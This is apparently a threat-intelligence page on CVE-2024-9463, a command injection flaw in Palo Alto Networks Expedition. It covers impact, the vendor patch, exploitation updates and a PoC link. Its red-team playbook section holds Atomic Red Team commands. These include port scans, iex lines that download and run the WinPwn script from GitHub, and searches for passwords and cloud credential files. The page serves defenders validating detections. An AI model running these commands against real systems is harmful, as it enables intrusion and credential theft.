CVE-2024-9463
Overview
This vulnerability is an OS command injection flaw resulting from improper sanitization of user-supplied input in Palo Alto Networks Expedition. The affected component is the API endpoint responsible for converting CSV to Parquet format, which executes system-level commands based on input parameters without adequate validation. This allows injection of arbitrary shell commands executed with root privileges on the underlying operating system.
Vulnerability Description
An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
Impact
An unauthenticated attacker can execute arbitrary OS commands with root privileges on the Expedition server, leading to full system compromise. This enables disclosure of usernames, cleartext passwords, device configurations, and API keys for managed PAN-OS firewalls. The attacker gains unauthorized access to sensitive firewall management data, potentially facilitating lateral movement and persistent access within the network. No authentication or user interaction is required to exploit this vulnerability, increasing the risk of widespread compromise.
Solution
Palo Alto Networks has released a security advisory identified as PAN-SA-2024-0010 addressing this vulnerability in Expedition. Users should apply the vendor-provided patches as detailed in the advisory available at https://security.paloaltonetworks.com/PAN-SA-2024-0010. No specific workarounds are recommended; updating to the fixed version is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Palo Alto Networks Expedition is characterized as an OS command injection flaw, which allows an unauthenticated attacker to execute arbitrary commands at the operating system level with root privileges. This critical weakness arises from insufficient input validation in the application, enabling malicious actors to manipulate input fields to inject commands that the system executes. The ramifications of this flaw are severe, as it can lead to the unauthorized disclosure of sensitive information, including usernames, cleartext passwords, device configurations, and API keys associated with PAN-OS firewalls. The ability to execute commands as a root user not only compromises the integrity of the system but also poses a significant threat to the confidentiality of the data managed by the application.
Attack vectors for exploiting this vulnerability are diverse and can be executed remotely, making it particularly dangerous. An attacker could leverage various methods, such as crafting specially formatted HTTP requests or utilizing web forms within the Expedition interface to inject malicious commands. Once the attacker successfully executes arbitrary commands, they can retrieve sensitive information stored on the system or manipulate configurations to further their objectives. For instance, an attacker could extract device configurations, which may contain critical network settings and security parameters, or obtain API keys that grant access to other integrated systems. This exploitation could be orchestrated in a targeted attack against organizations that rely on Palo Alto Networks Expedition for managing their firewall configurations.
The real-world impact of this vulnerability is substantial, particularly for organizations that depend on the affected product for network security management. The potential for data breaches is high, as attackers could gain access to sensitive information that could be leveraged for further attacks or sold on the dark web. The exposure of cleartext passwords and API keys not only compromises the immediate security of the affected systems but also poses long-term risks, as these credentials could be used to infiltrate other connected systems or services. The business risk extends beyond immediate data loss; organizations may face regulatory penalties, reputational damage, and loss of customer trust, all of which can have significant financial implications.
To address this vulnerability, organizations must implement robust detection and mitigation strategies. Regular security assessments and penetration testing should be conducted to identify potential weaknesses in the application and its configurations. Employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Additionally, organizations should enforce strict access controls and ensure that only authenticated users can interact with critical functionalities of the Expedition application. Updating and patching the software promptly when fixes are released is essential to close the window of opportunity for attackers. Furthermore, implementing logging and monitoring mechanisms can help detect unusual activities that may indicate exploitation attempts, allowing for timely incident response.
In conclusion, the OS command injection vulnerability in Palo Alto Networks Expedition represents a significant threat to organizations utilizing this tool for network security management. The potential for unauthorized command execution and subsequent data disclosure underscores the necessity for proactive security measures. By employing a combination of detection, mitigation, and response strategies, organizations can better protect themselves from the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-9463, indicating that exploitation attempts against the Palo Alto Networks Expedition vulnerability are emerging in the wild. This development is underscored by the recent inclusion of the vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, which signals increased attention from threat actors and prioritization by defenders. The availability of a public proof-of-concept exploit further lowers the barrier for adversaries to weaponize this flaw, potentially accelerating attack campaigns. Although ransomware involvement remains unconfirmed, the elevated exploitation trend heightens the risk of sensitive credential and configuration disclosures, which could facilitate subsequent lateral movement or compromise of PAN-OS firewalls. Consequently, the threat level associated with CVE-2024-9463 has intensified from a theoretical concern to an actively exploited risk, warranting heightened vigilance from security teams monitoring Expedition deployments.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-9463, with telemetry indicating a significant upward trend in attacker activity. The EPSS score has concurrently risen, reflecting an increased likelihood of exploitation in the wild. This surge underscores a growing adversary focus on leveraging the OS command injection vulnerability in Palo Alto Networks Expedition to gain root-level access and exfiltrate sensitive credentials and configurations. The availability of a public proof-of-concept exploit continues to lower the technical barrier for threat actors, potentially accelerating attack campaigns. Although ransomware involvement remains unconfirmed, the intensifying exploitation trend elevates the risk of broader network compromise through credential theft and lateral movement. Consequently, the threat level for CVE-2024-9463 has shifted from a moderate concern to a high-priority active threat, necessitating enhanced monitoring and response efforts from defenders overseeing Expedition environments.
Update 3 — July 06, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-9463, as reflected by a discernible uptick in telemetry from our sensors. This increase in activity underscores a growing adversary focus on leveraging the unauthenticated OS command injection vulnerability in Palo Alto Networks Expedition to obtain sensitive credentials and device configurations. The persistence of a publicly available proof-of-concept exploit continues to lower the barrier for threat actors, facilitating more frequent and potentially automated attacks. Although ransomware involvement remains unconfirmed, the intensifying exploitation trend heightens the risk of widespread credential compromise and lateral movement within affected networks. Consequently, the threat level associated with CVE-2024-9463 has been elevated to a high-priority active threat, signaling an urgent need for defenders to enhance detection and response capabilities around Expedition deployments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Expedition | All |
cpe:2.3:a:paloaltonetworks:expedition:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
momo1239/CVE-2024-9463-Proof-of-Concept
Proof of Concept for CVE-2024-9463
|
momo1239 | 1 | 0 | 2025-05-22 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
45%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9463 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/PAN-SA-2024-0010 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-9463 |